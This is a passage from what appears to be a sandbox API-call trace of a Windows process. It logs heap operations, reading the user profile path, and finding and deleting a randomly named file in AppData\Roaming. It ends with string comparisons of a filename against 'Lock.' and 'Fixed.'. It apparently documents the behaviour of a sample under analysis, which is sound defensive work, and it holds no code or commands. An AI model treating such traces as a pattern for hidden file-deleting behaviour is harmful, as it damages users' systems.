hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.893] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0198.894] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.894] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0198.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/gFulebPw7UZ.flv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv", lpFilePart=0x8bedfc*="gFulebPw7UZ.flv") returned 0x3d [0198.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.896] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfulebpw7uz.flv")) returned 0x2020 [0198.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd3f190, ftCreationTime.dwHighDateTime=0x1d4ce53, ftLastAccessTime.dwLowDateTime=0x58527c20, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x58527c20, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x126b3, dwReserved0=0xace, dwReserved1=0x4, cFileName="gFulebPw7UZ.flv", cAlternateFileName="GFULEB~1.FLV")) returned 0xaa57a0 [0198.896] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfulebpw7uz.flv")) returned 1 [0198.898] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dd3f190, ftCreationTime.dwHighDateTime=0x1d4ce53, ftLastAccessTime.dwLowDateTime=0x58527c20, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x58527c20, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x126b3, dwReserved0=0xace, dwReserved1=0x4, cFileName="gFulebPw7UZ.flv", cAlternateFileName="GFULEB~1.FLV")) returned 0 [0198.898] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0198.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.899] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0198.899] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0198.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.900] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0198.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/gFulebPw7UZ.flv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv", lpFilePart=0x8bf658*="gFulebPw7UZ.flv") returned 0x3d [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.911] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gFulebPw7UZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfulebpw7uz.flv")) returned 0xffffffff [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0198.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHNzGfsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNzGfsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NzGfsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zGfsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fsXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sXtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XtZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZO 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LRI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RI5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.913] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHNzGfsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNzGfsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NzGfsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zGfsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fsXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sXtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XtZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZO 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6LRI5J.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 